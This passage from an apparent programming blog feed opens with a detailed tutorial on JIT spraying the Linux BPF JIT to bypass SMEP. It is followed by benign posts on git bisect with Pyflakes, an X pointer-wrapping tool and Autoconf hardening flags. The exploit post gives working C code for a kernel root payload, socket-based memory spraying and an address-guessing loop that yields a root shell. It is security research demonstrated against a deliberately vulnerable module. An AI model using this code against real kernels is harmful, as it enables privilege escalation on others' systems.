The JIT will write into executable memory on our behalf, and we have some control over what it writes.</p><p>Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:</p><pre><code>x = 0xa8XXYYZZ<br />x = 0xa8PPQQRR<br />x = ...</code></pre><p>(Here <code>XXYYZZ</code> and <code>PPQQRR</code> stand for arbitrary three-byte quantities.) The JIT might decide to put variable <code>x</code> in the <code>%eax</code> machine register, and produce x86 code like this:</p><pre><code>machine code assembly (AT&amp;T syntax)<br /><br />b8 ZZ YY XX a8 mov $0xa8XXYYZZ, %eax<br />b8 RR QQ PP a8 mov $0xa8PPQQRR, %eax<br />b8 ...</code></pre><p>Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like</p><pre><code>ZZ YY XX (payload instruction)<br />a8 b8 test $0xb8, %al<br />RR QQ PP (payload instruction)<br />a8 b8 test $0xb8, %al<br />...</code></pre><p>We control those bytes <code>ZZ YY XX</code> and <code>RR QQ PP</code>. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.</p><h1 id="attacking-the-bpf-jit">Attacking the BPF JIT</h1><p>Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are <a href="http://www.freebsd.org/cgi/man.cgi?query=bpf&amp;apropos=0&amp;sektion=0&amp;manpath=FreeBSD+8-current&amp;format=html#FILTER_MACHINE">virtual machine</a> programs which run in kernel mode. 
This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0a14842f5a3c0e88a1e59fac5c3025db39721f74">implements</a> the BPF virtual machine using a just-in-time compiler.</p><p>For our JIT spray attack, we will build a BPF program in memory.</p><pre class="sourceCode c"><code class="sourceCode c">size_t code_len = <span class="dv">0</span>;<br /><span class="kw">struct</span> sock_filter code[<span class="dv">1024</span>];<br /><br /><span class="dt">void</span> emit_bpf(<span class="dt">uint16_t</span> opcode, <span class="dt">uint32_t</span> operand) {<br /> code[code_len++] = (<span class="kw">struct</span> sock_filter) BPF_STMT(opcode, operand);<br />}</code></pre><p>A BPF &quot;load immediate&quot; instruction will compile to <span style="white-space: nowrap;"><code>mov $x, %eax</code></span>. We embed our payload instructions inside these, exactly as we saw above.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="co">// Embed a three-byte x86 instruction.</span><br /><span class="dt">void</span> emit3(<span class="dt">uint8_t</span> x, <span class="dt">uint8_t</span> y, <span class="dt">uint8_t</span> z) {<br /> <span class="kw">union</span> {<br /> <span class="dt">uint8_t</span> buf[<span class="dv">4</span>];<br /> <span class="dt">uint32_t</span> imm;<br /> } operand = {<br /> .buf = { x, y, z, <span class="bn">0xa8</span> }<br /> };<br /><br /> emit_bpf(BPF_LD+BPF_IMM, operand.imm);<br />}<br /><br /><span class="co">// Pad shorter instructions with nops.</span><br /><span class="ot">#define emit2(_x, _y) emit3((_x), (_y), 0x90)</span><br /><span class="ot">#define emit1(_x) emit3((_x), 0x90, 0x90)</span></code></pre><p>Remember, the byte <code>a8</code> eats the opcode <code>b8</code> from the following legitimate <code>mov</code> instruction, turning into the harmless 
instruction <span style="white-space: nowrap;"><code>test $0xb8, %al</code></span>.</p><p>Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="dt">void</span> emit_call(<span class="dt">uint32_t</span> addr) {<br /> emit2(<span class="bn">0xb4</span>, (addr &amp; <span class="bn">0xff000000</span>) &gt;&gt; <span class="dv">24</span>); <span class="co">// mov $x, %ah</span><br /> emit2(<span class="bn">0xb0</span>, (addr &amp; <span class="bn">0x00ff0000</span>) &gt;&gt; <span class="dv">16</span>); <span class="co">// mov $x, %al</span><br /> emit3(<span class="bn">0xc1</span>, <span class="bn">0xe0</span>, <span class="bn">0x10</span>); <span class="co">// shl $16, %eax</span><br /> emit2(<span class="bn">0xb4</span>, (addr &amp; <span class="bn">0x0000ff00</span>) &gt;&gt; <span class="dv">8</span>); <span class="co">// mov $x, %ah</span><br /> emit2(<span class="bn">0xb0</span>, (addr &amp; <span class="bn">0x000000ff</span>)); <span class="co">// mov $x, %al</span><br /> emit2(<span class="bn">0x48</span>, <span class="bn">0x98</span>); <span class="co">// cltq</span><br /> emit2(<span class="bn">0xff</span>, <span class="bn">0xd0</span>); <span class="co">// call *%rax</span><br />}</code></pre><p>Then we can build a classic &quot;get root&quot; payload like so:</p><pre class="sourceCode c"><code class="sourceCode c">emit3(<span class="bn">0x48</span>, <span class="bn">0x31</span>, <span class="bn">0xff</span>); <span class="co">// xor %rdi, %rdi</span><br />emit_call(get_kernel_symbol(<span class="st">&quot;prepare_kernel_cred&quot;</span>));<br />emit3(<span class="bn">0x48</span>, <span class="bn">0x89</span>, <span class="bn">0xc7</span>); <span class="co">// mov %rax, %rdi</span><br />emit_call(get_kernel_symbol(<span 
class="st">&quot;commit_creds&quot;</span>));<br />emit1(<span class="bn">0xc3</span>); <span class="co">// ret</span></code></pre><p>This is just the C call</p><pre class="sourceCode c"><code class="sourceCode c">commit_creds(prepare_kernel_cred(<span class="dv">0</span>));</code></pre><p>expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.</p><p>Looking up function addresses is a well-studied part of kernel exploitation. My <code>get_kernel_symbol</code> just greps through <code>/proc/kallsyms</code>, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.</p><p>Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.</p><h1 id="filling-memory-with-sockets">Filling memory with sockets</h1><p>The &quot;spray&quot; part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.</p><p>For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT <a href="http://lxr.linux.no/linux+v3.6.5/arch/x86/net/bpf_jit_comp.c#L627">uses <code>module_alloc</code></a> to allocate memory in the <a href="http://lxr.linux.no/linux+v3.6.5/Documentation/x86/x86_64/mm.txt">1.5 GB space</a> reserved for kernel modules. 
And the compiled program is aligned to a <a href="http://en.wikipedia.org/wiki/Page_(computer_memory)">page</a>, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.</p><p>Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/setrlimit.2.html">resource limit</a> on the number of open files. But there's a fun way around this limitation. (I learned this trick from <a href="http://blog.nelhage.com/">Nelson Elhage</a> but I haven't seen it published before.)</p><p><a href="http://en.wikipedia.org/wiki/Unix_domain_socket">UNIX domain sockets</a> can transmit things other than raw bytes. In particular, they can <a href="http://www.lst.de/~okir/blackhats/node121.html">transmit</a> file descriptors<sup><a href="#bpf_spray_fn1" class="footnoteRef" id="bpf_spray_fnref1">1</a></sup>. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!</p><p>So we can make as many BPF-filtered sockets as we want, as long as we send them into <em>other</em> sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth<sup><a href="#bpf_spray_fn2" class="footnoteRef" id="bpf_spray_fnref2">2</a></sup> of sockets sent through sockets sent through etc. 
But we can easily hit our goal of 8000 filter programs using a tree structure.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#define SOCKET_FANOUT 20</span><br /><span class="ot">#define SOCKET_DEPTH 3</span><br /><br /><span class="co">// Create a socket with our BPF program attached.</span><br /><span class="dt">int</span> create_filtered_socket() {<br /> <span class="dt">int</span> fd = socket(AF_INET, SOCK_DGRAM, <span class="dv">0</span>);<br /> setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &amp;filt, <span class="kw">sizeof</span>(filt));<br /> <span class="kw">return</span> fd;<br />}<br /><br /><span class="co">// Send an fd through a UNIX socket.</span><br /><span class="dt">void</span> send_fd(<span class="dt">int</span> dest, <span class="dt">int</span> fd_to_send);<br /><br /><span class="co">// Create a whole bunch of filtered sockets.</span><br /><span class="dt">void</span> create_socket_tree(<span class="dt">int</span> parent, size_t depth) {<br /> <span class="dt">int</span> fds[<span class="dv">2</span>];<br /> size_t i;<br /> <span class="kw">for</span> (i=<span class="dv">0</span>; i&lt;SOCKET_FANOUT; i++) {<br /> <span class="kw">if</span> (depth == (SOCKET_DEPTH - <span class="dv">1</span>)) {<br /> <span class="co">// Leaf of the tree.</span><br /> <span class="co">// Create a filtered socket and send it to &#39;parent&#39;.</span><br /> fds[<span class="dv">0</span>] = create_filtered_socket();<br /> send_fd(parent, fds[<span class="dv">0</span>]);<br /> close(fds[<span class="dv">0</span>]);<br /> } <span class="kw">else</span> {<br /> <span class="co">// Interior node of the tree.</span><br /> <span class="co">// Send a subtree into a UNIX socket pair.</span><br /> socketpair(AF_UNIX, SOCK_DGRAM, <span class="dv">0</span>, fds);<br /> create_socket_tree(fds[<span class="dv">0</span>], depth<span class="dv">+1</span>);<br /><br /> <span class="co">// Send the pair to &#39;parent&#39; and close it.</span><br /> 
send_fd(parent, fds[<span class="dv">0</span>]);<br /> send_fd(parent, fds[<span class="dv">1</span>]);<br /> close(fds[<span class="dv">0</span>]);<br /> close(fds[<span class="dv">1</span>]);<br /> }<br /> }<br />}</code></pre><p>The <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/cmsg.3.html">interface</a> for sending FDs through a UNIX socket is really, <em>really</em> ugly, so I didn't show that code here. You can check out the <a href="https://github.com/kmcallister/alameda/blob/master/alameda.c#L388">implementation of <code>send_fd</code></a> if you want to.</p><h1 id="the-exploit">The exploit</h1><p>Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure <a href="https://github.com/kmcallister/alameda/blob/master/ko/jump.c">kernel module</a> which will jump to any address we write to <code>/proc/jump</code>.</p><p>We know that a JIT-produced code page is somewhere in the <a href="http://lxr.linux.no/linux+v3.6.5/Documentation/x86/x86_64/mm.txt">region</a> used for kernel modules. We want to land 3 bytes into this page, skipping an <span style="white-space: nowrap"><code>xor %eax, %eax</code></span> (<code>31 c0</code>) and the initial <code>b8</code> opcode.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#define MODULE_START 0xffffffffa0000000UL</span><br /><span class="ot">#define MODULE_END 0xfffffffffff00000UL</span><br /><span class="ot">#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)</span><br /><br /><span class="ot">#define PAYLOAD_OFFSET 3</span></code></pre><p>A bad guess will likely oops the kernel and kill the current process. 
So we <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/fork.2.html">fork</a> off child processes to do the guessing, and keep doing this as long as they're dying with <code>SIGKILL</code>.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="dt">int</span> status, jump_fd, urandom;<br /><span class="dt">unsigned</span> <span class="dt">int</span> pgnum;<br /><span class="dt">uint64_t</span> payload_addr;<br /><br /><span class="co">// ...</span><br /><br />jump_fd = open(<span class="st">&quot;/proc/jump&quot;</span>, O_WRONLY);<br />urandom = open(<span class="st">&quot;/dev/urandom&quot;</span>, O_RDONLY);<br /><br /><span class="kw">do</span> {<br /> <span class="kw">if</span> (!fork()) {<br /> <span class="co">// Child process</span><br /> read(urandom, &amp;pgnum, <span class="kw">sizeof</span>(pgnum));<br /> pgnum %= MODULE_PAGES;<br /> payload_addr = MODULE_START + (<span class="bn">0x1000</span> * pgnum) + PAYLOAD_OFFSET;<br /><br /> write(jump_fd, &amp;payload_addr, <span class="kw">sizeof</span>(payload_addr));<br /> execl(<span class="st">&quot;/bin/sh&quot;</span>, <span class="st">&quot;sh&quot;</span>, NULL); <span class="co">// Root shell!</span><br /> } <span class="kw">else</span> {<br /> wait(&amp;status);<br /> }<br />} <span class="kw">while</span> (WIFSIGNALED(status) &amp;&amp; (WTERMSIG(status) == SIGKILL));</code></pre><p>The <code>fork</code>ed children get a copy of the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.</p><h1 id="notes">Notes</h1><p>The full source is <a href="https://github.com/kmcallister/alameda">available on GitHub</a>. 
It includes some error handling and cleanup code that I elided above.</p><p>I'll admit that this is mostly a curiosity, for two reasons:</p><ul class="incremental"><li>SMEP is not widely deployed yet.</li><li>The BPF JIT is disabled by default, and distributions don't enable it.</li></ul><p>Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for <a href="http://outflux.net/teach-seccomp/">process sandboxing</a> as well.</p><p>The BPF JIT is enabled by writing <code>1</code> to <code>/proc/sys/net/core/bpf_jit_enable</code>. You can write <code>2</code> to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.</p><p>I don't have a CPU with SMEP, but I did try a <a href="http://grsecurity.net/">grsecurity</a> / PaX hardened kernel. PaX's KERNEXEC feature implements<sup><a href="#fn3" class="footnoteRef" id="fnref3">3</a></sup> in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)</p><p>The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...</p><div class="footnotes"><hr /><ol><li id="bpf_spray_fn1"><p>Actually, <a href="http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap03.html#tag_03_253">file <em>descriptions</em></a>. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. 
When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.<a href="#bpf_spray_fnref1">↩</a></p></li><li id="bpf_spray_fn2"><p>While testing this code, I got the error <code>ETOOMANYREFS</code>. This was easy to track down, as there's only <a href="http://lxr.linux.no/linux+v3.6.5/net/unix/af_unix.c#L1376">one place</a> in the entire kernel where it is used.<a href="#bpf_spray_fnref2">↩</a></p></li><li id="fn3"><p>On i386, KERNEXEC uses <a href="http://www.cs.cmu.edu/~410/doc/segments/segments.html">x86 segmentation</a>, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a <a href="http://gcc.gnu.org/wiki/plugins">GCC plugin</a> to instrument every computed control flow instruction in the kernel. Specifically, it <code>or</code>s the target address with <span style="white-space: nowrap;"><code>(1 &lt;&lt; 63)</code></span>. If the target was a userspace address, the new address will be <a href="http://en.wikipedia.org/wiki/X86-64#Canonical_form_addresses">non-canonical</a> and the processor will fault.<a href="#fnref3">↩</a></p></li></ol></div>http://mainisusuallyafunction.blogspot.com/2012/11/attacking-hardened-linux-systems-with.htmlnoreply@blogger.com (keegan)20tag:blogger.com,1999:blog-1563623855220143059.post-1095967032934274147Tue, 18 Sep 2012 14:45:00 +00002012-09-18T07:45:44.771-07:00codedebugginggitpythonTracking down unused variables with Pyflakes and git bisect<p>I was working on a Python project when I noticed a variable that was defined but never used. Does this indicate that some important code was accidentally deleted? Or was there just a minor oversight during refactoring?</p><p>To answer this question, I wanted to see the Git commit which removed the last use of this variable. 
This sounds like a job for <a href="http://www.kernel.org/pub/software/scm/git/docs/git-bisect.html"><code>git bisect</code></a>. And because <a href="http://pypi.python.org/pypi/pyflakes">Pyflakes</a> can detect unused variables, the whole process is completely automatic.</p><p>I made a guess that the <code>mystery_variable</code> became unused sometime within the past two weeks. Then I told Git to consider a commit &quot;good&quot; if Pyflakes's list of complaints does not mention <code>mystery_variable</code>.</p><pre><code><span class="Prompt">$</span> <span class="Entry">git bisect start master master@{'2 weeks ago'}</span><br />Already on 'master'<br />Bisecting: 150 revisions left to test after this (roughly 7 steps)<br />[066327622129dbe863f6e2fc4746ff9e869bd049] Synthesize gravity<br /><br /><span class="Prompt">$</span> <span class="Entry">git bisect run bash -c '! pyflakes foo.py | grep mystery_variable'</span><br />running bash -c ! pyflakes foo.py | grep mystery_variable<br />Bisecting: 75 revisions left to test after this (roughly 6 steps)<br />[d3a5665eff478cccfb86d994a8fc289446325fbf] Model object components<br />running bash -c ! pyflakes foo.py | grep mystery_variable<br />Bisecting: 37 revisions left to test after this (roughly 5 steps)<br />[6ddcfbf27a1a4548acf972a6b817e485743f6bd9] Time-compress simulator clock<br />...<br /><br />running bash -c ! 
pyflakes foo.py | grep mystery_variable<br />9c2b2f006207ae9f274f9182efeb3e009d18ed04 is the first bad commit<br />commit 9c2b2f006207ae9f274f9182efeb3e009d18ed04<br />Author: Ben Bitdiddle &lt;bitdiddle@example.com&gt;<br />Date: Fri Sep 14 01:38:31 2012 -0400<br /><br /> Reticulate splines<br /></code></pre><p>Now I can examine this commit and see what happened.</p>http://mainisusuallyafunction.blogspot.com/2012/09/tracking-down-unused-variables-with.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-6816904949799939840Mon, 10 Sep 2012 01:51:00 +00002012-09-09T18:51:05.757-07:00codeimadethistarallitaralli: Screen edge pointer wrapping for X<p>The maximum travel distance between points on a desktop is substantially reduced if the pointer is allowed to travel off a screen edge and reappear at the opposite edge. In other words, we change the topology of the desktop to be that of a torus. This is not a new idea: it's implemented in several <a href="http://fixunix.com/xwindows/91117-can-mouse-wrap-around-screen-edges-xfree86.html">window managers</a>, programs for <a href="http://www.addictivetips.com/windows-tips/wrap-mouse-pointer-around-the-screen-in-windows-with-edgeless-2/">Windows</a> and <a href="http://www.digicowsoftware.com/detail?_app=Wraparound">Mac OS X</a>, and is even the subject of a <a href="http://insitu.lri.fr/TorusDesktop/TorusDesktop">research paper</a>.</p><p>I wanted a standalone program to implement mouse pointer wrapping for X Windows on GNU/Linux. Previously I was using <a href="http://synergy-foss.org/">Synergy</a> for this task. Synergy is a very cool program, but it's not a good choice for pointer wrapping on a single machine.</p><ul class="incremental"><li><p><strong>Correctness</strong>: I have several monitors at different resolutions, which means my desktop isn't rectangular. 
Synergy didn't understand where the edge of each monitor was.</p></li><li><p><strong>Security</strong>: I don't need the exposure of 95,000 lines of code for this simple task. Even if there are no bugs in Synergy, I'm one configuration mistake away from running an unencrypted network keylogger.</p></li><li><p><strong>Energy efficiency</strong>: Synergy wakes up 40 times per second even when nothing is happening. This can have a significant impact on laptop battery life.</p></li></ul><p>So I wrote <a href="https://github.com/kmcallister/taralli"><code>taralli</code></a> as a simple replacement. It doesn't automatically understand non-rectangular desktops, but you can easily customize the pointer position mapping, to implement multi-monitor wrap-around or many other behaviors. (If someone would like to contribute the code to get multi-monitor information from <a href="http://en.wikipedia.org/wiki/Xinerama">Xinerama</a> or something, I would be happy to add that.)</p><p><code>taralli</code> is under 100 lines of C99. It has been tested on GNU/Linux and is likely portable to other X platforms. You can <a href="https://github.com/kmcallister/taralli">download it from GitHub</a>, which is also a great place to submit any bug reports or patches.</p>http://mainisusuallyafunction.blogspot.com/2012/09/taralli-screen-edge-pointer-wrapping.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-7224942617544900091Sun, 13 May 2012 16:59:00 +00002012-05-13T09:59:04.470-07:00autotoolsccodecxxmoshsecurityAutomatic binary hardening with Autoconf<p>How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.</p><p>Operating systems now support a variety of tricks to make life difficult for would-be attackers. 
But most of these hardening features need to be enabled at compile time. When I started contributing to <a href="http://mosh.mit.edu/">Mosh</a>, I made it a goal to build with full hardening on every platform, not just <a href="https://wiki.ubuntu.com/Security/Features">proactive</a> distributions like Ubuntu. This means detecting available hardening features at compile time.</p><p>Mosh uses Autotools, so this code is naturally part of the <a href="http://www.gnu.org/software/autoconf/">Autoconf</a> script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.</p><p>I've published an <a href="https://github.com/kmcallister/autoharden">example project</a> which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I <a href="https://github.com/kmcallister/autoharden/blob/master/LICENSE">waive all copyright</a> and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the <code>m4/</code> subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.</p><p>This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.</p><h1 id="how-it-works">How it works</h1><p>The basic idea is simple. We use <code>AX_CHECK_{COMPILE,LINK}_FLAG</code> from the <a href="http://www.gnu.org/software/autoconf-archive/">Autoconf Archive</a> to detect support for each feature. 
The syntax is</p><div style="padding-left: 20px"><code>AX_CHECK_COMPILE_FLAG</code>(<em>flag</em>, <em>action-if-supported</em>, <em>action-if-unsupported</em>, <em>extra-flags</em>) </div> <p>For <em>extra-flags</em> we generally pass <code>-Werror</code> so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the <em>action-if-supported</em> and <em>action-if-unsupported</em> blocks. You can see the full story in <a href="https://github.com/kmcallister/autoharden/blob/master/configure.ac#L21"><code>configure.ac</code></a>.</p><p>We accumulate all the supported flags into <code>HARDEN_{C,LD}FLAGS</code> and substitute these into each <code>Makefile.am</code>. The hardening flags take effect even if the user overrides <code>CFLAGS</code> on the command line. To explicitly disable hardening, pass</p><pre><code>./configure --disable-hardening</code></pre><p>A useful command when testing is</p><pre><code>grep HARDEN config.log<br /><br /></code></pre><h1 id="complications">Complications</h1><p><a href="http://clang.llvm.org/">Clang</a> will not error out on unrecognized flags, even with <code>-Werror</code>. Instead it prints a message like</p><pre><code>clang: warning: argument unused during compilation: &#39;-foo&#39;</code></pre><p>and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script <a href="https://github.com/kmcallister/autoharden/blob/master/scripts/wrap-compiler-for-flag-check"><code>wrap-compiler-for-flag-check</code></a> runs a command and errors out if the command prints a line containing &quot;<code>warning: argument unused</code>&quot;. 
Then <code>configure</code> temporarily sets</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="ot">CC=</span><span class="st">&quot;</span><span class="ot">$srcdir</span><span class="st">/scripts/wrap-compiler-for-flag-check </span><span class="ot">$CC</span><span class="st">&quot;</span></code></pre><p>while performing the flag checks.</p><p>When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags <a href="https://github.com/keithw/mosh/issues/203">conflict</a> with ours. For example we set <span style="white-space:nowrap;"><code>-Wstack-protector</code></span>, meaning &quot;warn about any unprotected functions&quot;, and they set <span style="white-space:nowrap;"><code>--param=ssp-buffer-size=4</code></span>, meaning &quot;don't protect functions with fewer than 4 bytes of buffers&quot;. Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to <a href="https://github.com/keithw/mosh/blob/mosh-1.2/debian/rules#L12"><code>debian/rules</code></a>:</p><pre><code>export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector<br />-include /usr/share/dpkg/buildflags.mk</code></pre><p>We did <a href="https://github.com/keithw/mosh/blob/dee09fb8fcaab9abcecb748be5b31088b9c2b987/fedora/mosh.spec#L32">something similar</a> for Fedora.</p><p>Yet another problem is that Debian distributes <a href="http://www.skarnet.org/software/skalibs/">skalibs</a> (a Mosh dependency) as a <a href="http://packages.debian.org/squeeze/skalibs-dev">static-only library</a>, built without <code>-fPIC</code>, which in turn prevents Mosh from using <code>-fPIC</code>. Mosh can build the relevant parts of skalibs <a href="https://github.com/keithw/mosh/tree/mosh-1.2/third/libstddjb">internally</a>, but Debian and Ubuntu don't want us doing that. 
The unfortunate solution is simply to <a href="https://github.com/keithw/mosh/commit/0eec0b60f0c5b3d94d5e382ea3d4aff35c879ed2">reimplement</a> the small amount of skalibs we were using on Linux.</p><h1 id="the-flags">The flags</h1><p>Here are the specific protections I enabled.</p><ul class="incremental"><li><p><a href="https://wiki.ubuntu.com/Security/Features#fortify-source"><code>-D_FORTIFY_SOURCE=2</code></a> enables some compile-time and run-time checks on memory and string manipulation. This requires <code>-O1</code> or higher. See also <a href="http://www.kernel.org/doc/man-pages/online/pages/man7/feature_test_macros.7.html"><code>man 7 feature_test_macros</code></a>.</p></li><li><p><a href="https://bugzilla.redhat.com/show_bug.cgi?id=491266"><code>-fno-strict-overflow</code></a> prevents GCC from optimizing away arithmetic overflow tests.</p></li><li><p><a href="https://wiki.ubuntu.com/Security/Features#stack-protector"><code>-fstack-protector-all</code></a> detects stack buffer overflows after they occur, using a <a href="http://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries">stack canary</a>. We also set <span style="white-space:nowrap;"><code>-Wstack-protector</code></span> (warn about unprotected functions) and <span style="white-space:nowrap;"><code>--param ssp-buffer-size=1</code></span> (protect regardless of buffer size). (Actually, the &quot;<code>-all</code>&quot; part of <span style="white-space:nowrap;"><code>-fstack-protector-all</code></span> might imply <span style="white-space:nowrap;"><code>ssp-buffer-size=1</code></span>.)</p></li><li><p>Attackers can use fragments of legitimate code already in memory to <a href="http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html">stitch together</a> exploits. This is much harder if they don't know where any of that code is located. Shared libraries get <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">random addresses</a> by default, but your program doesn't. 
Even an exploit against a shared library can take advantage of that. So we build a <a href="https://wiki.ubuntu.com/Security/Features#pie">position independent executable</a> (PIE), with the goal that <em>every</em> executable page has a randomized address.</p></li><li><p>Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the <a href="http://www.iecc.com/linker/linker10.html">dynamic loader</a> needs to perform relocations there. The GNU linker flag <span style="white-space:nowrap;"><code>-z relro</code></span> arranges to set them as read-only once the dynamic loader is done with them.</p><p>In particular, this can <a href="http://www.airs.com/blog/archives/189">protect</a> the <a href="http://www.technovelty.org/linux/pltgot.html">PLT and GOT</a>, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set <span style="white-space:nowrap;"><code>-z now</code></span> to resolve PLT entries at startup so they get RELRO protection.</p></li></ul><p>In the example project I also enabled <code>-Wall -Wextra -Werror</code>. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project <span style="white-space:nowrap;"><code>-Wall</code></span>-clean, you can at least add security-relevant checks such as <span style="white-space:nowrap;"><code>-Wformat-security</code></span>.</p><h1 id="demonstration">Demonstration</h1><p>On x86 Linux, we can check the hardening features using Tobias Klein's <a href="http://www.trapkit.de/tools/checksec.html">checksec.sh</a>. 
First, as a control, let's build with no hardening.</p><pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh --disable-hardening</span><br />+ autoreconf -fi<br />+ ./configure --disable-hardening<br />...<br />+ make<br />...<br /><span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span><br /><span style="color:red">No RELRO</span> <span style="color:red">No canary found</span> <span style="color:green">NX enabled</span> <span style="color:red">No PIE</span><br /></code></pre> <p>The <a href="http://en.wikipedia.org/wiki/NX_bit">no-execute bit</a> (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:</p><pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh</span><br />+ autoreconf -fi<br />+ ./configure<br />...<br />checking whether C compiler accepts -fno-strict-overflow... yes<br />checking whether C++ compiler accepts -fno-strict-overflow... yes<br />checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes<br />checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes<br />checking whether C compiler accepts -fstack-protector-all... yes<br />checking whether C++ compiler accepts -fstack-protector-all... yes<br />checking whether the linker accepts -fstack-protector-all... yes<br />checking whether C compiler accepts -Wstack-protector... yes<br />checking whether C++ compiler accepts -Wstack-protector... yes<br />checking whether C compiler accepts --param ssp-buffer-size=1... yes<br />checking whether C++ compiler accepts --param ssp-buffer-size=1... yes<br />checking whether C compiler accepts -fPIE... yes<br />checking whether C++ compiler accepts -fPIE... yes<br />checking whether the linker accepts -fPIE -pie... yes<br />checking whether the linker accepts -Wl,-z,relro... 
